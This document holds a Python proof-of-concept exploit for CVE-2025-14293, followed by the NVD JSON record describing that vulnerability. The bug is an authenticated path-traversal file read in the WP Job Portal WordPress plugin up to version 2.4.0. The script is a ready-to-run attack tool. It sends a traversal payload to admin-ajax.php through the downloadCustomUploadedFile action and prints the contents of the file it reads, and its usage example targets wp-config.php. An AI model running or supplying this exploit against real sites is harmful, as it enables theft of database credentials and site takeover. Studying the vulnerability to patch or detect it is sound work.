CVE-2025-14293

import requests import sys from urllib.parse import urlencode # CVE-2025-14293 PoC - WP Job Portal Arbitrary File Read # Affected: WP Job Portal <= 2.4.0 def exploit(target_url, cookie, file_path): """ Exploit arbitrary file read vulnerability in WP Job Portal Args: target_url: Base URL of the WordPress site cookie: Valid session cookie (Subscriber-level or higher) file_path: Path to the file to read (e.g., ../../wp-config.php) """ # Target endpoint with path traversal endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct the malicious request params = { 'action': 'downloadCustomUploadedFile', 'fileid': f'../../../{file_path}' } headers = { 'Cookie': cookie, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: response = requests.get(endpoint, params=params, headers=headers, timeout=30) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Successfully read file: {file_path}") print(f"[+] File size: {len(response.content)} bytes") print("\n--- File Content ---") print(response.text[:5000]) # Print first 5000 chars return True else: print(f"[-] Failed to read file. Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-14293.py <target_url> <cookie> <file_path>") print("Example: python cve-2025-14293.py http://example.com 'wordpress_logged_in_xxx=yyy' 'wp-config.php'") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] file_path = sys.argv[3] exploit(target, cookie, file_path)

{"cve": {"id": "CVE-2025-14293", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:46.730", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Job Portal plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.4.0 via the 'downloadCustomUploadedFile' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/modules/customfield/model.php#L908", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.4.1/modules/customfield/model.php#L908", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6dfcd264-39e3-44af-8e0e-5c35734524d0?source=cve", "source": "[email protected]"}]}}